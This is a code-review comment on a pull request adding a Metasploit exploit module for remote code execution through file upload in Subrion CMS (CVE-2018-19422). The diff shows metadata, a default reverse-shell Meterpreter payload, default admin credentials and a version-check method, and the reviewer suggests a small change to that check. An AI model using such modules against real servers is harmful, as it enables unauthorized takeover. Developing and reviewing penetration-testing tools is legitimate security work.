modules/exploits/linux/http/subrion_cms_file_upload_rce.rb

```diff
@@ -0,0 +1,213 @@
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Hexife',             # Original discovery, PoC, and CVE submission
+          'Fellipe Oliveira',   # ExploitDB author
+          'Ismail E. Dawoodjee' # Metasploit module author
+        ],
+        'References' => [
+          [ 'EDB', '49876' ],
+          [ 'CVE', '2018-19422' ],
+          [ 'URL', 'https://github.com/intelliants/subrion/issues/801' ],
+          [ 'URL', 'https://github.com/intelliants/subrion/issues/840' ],
+          [ 'URL', 'https://github.com/advisories/GHSA-73xj-v6gc-g5p5' ]
+        ],
+        'Platform' => 'php',
+        'Arch' => ARCH_PHP,
+        'Targets' => [
+          [
+            'PHP',
+            {
+              'Platform' => 'php',
+              'Arch' => ARCH_PHP,
+              'Type' => :php,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'php/meterpreter/reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'Privileged' => false,
+        'DisclosureDate' => '2018-11-04',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
+        }
+      )
+    )
+    register_options(
+      [
+        Opt::RPORT(80, true, 'Subrion CMS default port'),
+        OptString.new('TARGETURI', [ true, 'Base path', '/' ]),
+        OptString.new('USERNAME', [ true, 'Username to authenticate with', 'admin' ]),
+        OptString.new('PASSWORD', [ true, 'Password to authenticate with', 'admin' ])
+      ]
+    )
+  end
+
+  def check
+    uri = normalize_uri(target_uri.path, 'panel/') # requires a trailing forward slash
+    url_login = "http://#{datastore['RHOST']}:#{datastore['RPORT']}#{uri}"
+    print_status("Checking target web server for a response at: #{url_login}")
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => uri
+    })
+
+    unless res
+      return CheckCode::Unknown('Target did not respond to check request.')
+    end
+
+    unless res.code == 200 && res.body.downcase.include?('subrion')
+      return CheckCode::Unknown('Target is not running Subrion CMS.')
+    end
+
+    print_good('Target is running Subrion CMS.')
+
+    print_status('Checking Subrion CMS version...')
+    version = res.body.match('Powered by <a href=.*')
+    version_number = version.to_s.split.last.scan(/\d+/).join('.') if version
+
+    unless version_number
+      return CheckCode::Detected('Subrion CMS version cannot be determined.')
+    end
+
+    print_good("Target is running Subrion CMS Version #{version_number}.")
+
+    if Rex::Version.new(version_number) <= Rex::Version.new('4.2.1')
+      print_warning(
+        'This version check does not guarantee that the target is vulnerable, ' \
+        'since a fix for the vulnerability can easily be applied by a web admin.'
+      )
+      return CheckCode::Appears
```

Comment:
Another option is to pass this message directly to `CheckCode::Appears`. This will be automatically displayed by Framework:
```suggestion
      return CheckCode::Appears(
        'This version check does not guarantee that the target is vulnerable, ' \
        'since a fix for the vulnerability can easily be applied by a web admin.'
      )
```